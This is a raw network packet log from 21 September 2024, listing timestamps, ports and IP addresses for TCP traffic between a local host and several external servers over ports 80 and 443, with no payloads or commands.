Sep 21, 2024 14:48:10.487479925 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487483025 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487495899 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487497091 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487509012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487515926 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487521887 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487535954 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487560987 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487801075 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487812996 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487824917 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487837076 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487848043 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487854958 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487863064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487874031 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487874985 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487885952 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487891912 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487921953 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487952948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487966061 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487972975 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:10.487977028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487987995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487989902 CEST	443	49725	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:10.487997055 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488001108 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488013983 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488024950 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488032103 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488037109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488050938 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488061905 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488065004 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488074064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488082886 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488085985 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488104105 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488106966 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488121033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488125086 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488132954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.488142967 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488145113 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.488157034 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.488168001 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.488173008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.488173962 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488179922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.488192081 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488199949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.488204002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488217115 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488219023 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.488228083 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488238096 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488240004 CEST	443	49725	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:10.488240004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488250971 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488266945 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488270998 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488282919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488292933 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488306999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488317966 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488322020 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488322020 CEST	49725	443	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:10.488328934 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488341093 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488351107 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488352060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488364935 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488368034 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488378048 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488385916 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488390923 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488403082 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488415003 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488424063 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488428116 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488440037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488451004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488461018 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488462925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488471985 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488476038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488492012 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488517046 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488826990 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488847017 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.488859892 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488872051 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488886118 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.488888979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488904953 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488909006 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488917112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488929033 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488931894 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488940954 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488954067 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488960028 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488967896 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.488976955 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.488995075 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489006042 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489016056 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489021063 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489033937 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489042044 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489046097 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489058971 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489068031 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489070892 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489083052 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489089966 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489094973 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489106894 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489109039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489126921 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489136934 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489140034 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489152908 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489160061 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489166021 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489176989 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489180088 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489192009 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489202976 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489207029 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489214897 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489231110 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489237070 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489248991 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489253044 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489262104 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489274025 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489280939 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489288092 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489296913 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489299059 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489311934 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489322901 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489331961 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489334106 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489346981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489352942 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489361048 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489372015 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489375114 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489386082 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489398003 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489403963 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489412069 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489423990 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489429951 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489439964 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489440918 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489454985 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489466906 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489470005 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489485025 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489495993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489497900 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489511013 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489514112 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489540100 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489564896 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489733934 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489748001 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489758968 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489770889 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489774942 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489783049 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489788055 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489797115 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489809990 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489814043 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489823103 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489833117 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489840984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489845037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.489854097 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489861012 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.489871025 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489885092 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.489901066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.489907026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.489913940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.489923000 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.489923954 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489937067 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489949942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.489959955 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.489970922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.489983082 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.489986897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.489993095 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490003109 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490015030 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490015984 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490017891 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.490031958 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490042925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490053892 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490060091 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490067959 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490080118 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490089893 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490099907 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490103006 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490114927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490123987 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490128040 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490139961 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490143061 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490151882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490161896 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490174055 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490186930 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490189075 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490199089 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490214109 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490221977 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490231991 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490235090 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.490247011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490257978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490257978 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490269899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490279913 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490293026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490295887 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.490295887 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490303993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490315914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490325928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490326881 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490336895 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490345001 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490350008 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490362883 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490366936 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490374088 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490385056 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490386963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490397930 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490400076 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490412951 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490425110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490427971 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490437984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490448952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490456104 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490469933 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490489006 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490659952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490672112 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490683079 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490695000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490700006 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490706921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490719080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490719080 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490732908 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490745068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490745068 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490756989 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490758896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490771055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490782022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490789890 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490802050 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490814924 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490814924 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490827084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490828991 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490839958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490855932 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490859985 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490873098 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490883112 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490886927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490896940 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490900040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490914106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490925074 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490926981 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490936995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490948915 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490958929 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490962029 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490974903 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.490977049 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490984917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.490988016 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491000891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491010904 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491014004 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491027117 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491035938 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491038084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491050959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491055965 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491063118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491075039 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491080046 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491089106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491101027 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491112947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491118908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491125107 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491127014 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491137981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491148949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491177082 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491295099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491307020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491326094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491329908 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491337061 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491348028 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491354942 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491359949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491370916 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491374016 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491388083 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491400957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.491408110 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491408110 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.491415024 CEST	80	49712	103.130.147.211	192.168.2.9
